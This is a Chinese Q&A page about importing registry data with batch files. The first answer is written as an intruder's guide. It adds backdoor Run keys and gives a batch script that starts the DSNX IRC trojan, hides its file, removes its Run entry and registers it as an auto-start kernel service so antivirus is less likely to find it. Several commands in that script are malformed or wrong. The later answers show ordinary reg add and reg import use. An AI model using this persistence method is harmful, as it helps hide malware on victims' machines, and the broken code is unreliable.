批处理中,如何将一段信息导入注册表
发布网友
发布时间:2023-12-05 04:29
我来回答
共3个回答
热心网友
时间:2024-10-20 09:07
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"Door"=C://WINNT//system32//door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C://WINNT//system32//door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
热心网友
时间:2024-10-20 09:07
把下面的代码copy到任意文件名.bat.运行.分拿来
@echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tvb /t REG_EXPAND_SZ /d %d:\\tvb.txt% /f >nul
热心网友
时间:2024-10-20 09:08
@echo off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "tvb" /d "d:\tvb.txt" /t REG_SZ /f
批处理中,如何将一段信息导入注册表
delete patch.dll REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]REM 这样不是更安全^_^.
利用批处理如何将*.reg导进注册表中?
双击就可以导入了、或通过“DOS”命令提示符键入“Regedit -s C:、1.reg”。
怎样用批处理导入注册表文件
把你的1.reg你的内容按上面的格式写入一个批处理中 注意最后/f就是不提示确认的 别掉了
如何用批处理导入这个注册表?
把单独的放在一个文件中如 1.reg 然后在bat里用一句话 就够了:reg import 1.reg//注意路径哦
如何使用批处理导入注册表
reg add命令和注册表项文件格式不一样,只能保存为文件然后用命令导入.regedit /s reg文件名 或者 reg import reg文件名
批处理写入注册表?
第一行的内容如下:dir /b 您的Shutdown 文件夹的路径 注意:如果路径中含有空格或者长文件名,需要用引号括起来。接下来是一个空格和一个大于号“>”,然后敲入拟保存这个批处理文件的路径,最后是这个批处理文件的名字。要找到文件路径,只需在浏览器里打开该文件夹,地址栏里显示的就是路径。如果...
批处理导入注册表
/s "1.reg"还有要在你的注册表文件开头加上 Windows Registry Editor Version 5.00 如果你只想用批处理命令也可以:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Pubwin2008全能破解王.exe" /f /v Debugger /d "1"以上代码同一行 ...
请问这条命令怎么用批处理导入注册表???
复制哈,用txt保存了,然后把txt改为bat批处理文件,运行就行了。我也没有这么试验,不知道到底行不行,也没胆量试验下。如果你要导入注册表的是[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command],那很简单保存下,把后缀名改为reg的,然后在运行里...
如何用批处理文件把程序写入注册表?
reg add "注册表中的路径“例如:REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v 修改IP /t REG_SZ /d "%~dp0自动修改IP.bat" /f 他它的意思就是在注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 中增加一个“修改IP”的项目,其值为“...
能否批处理导入注册表内容
把你要导入的内容,保存为reg注册表文件,假设名为SID.REG 然后利用reg import SID.REG命令导入即可。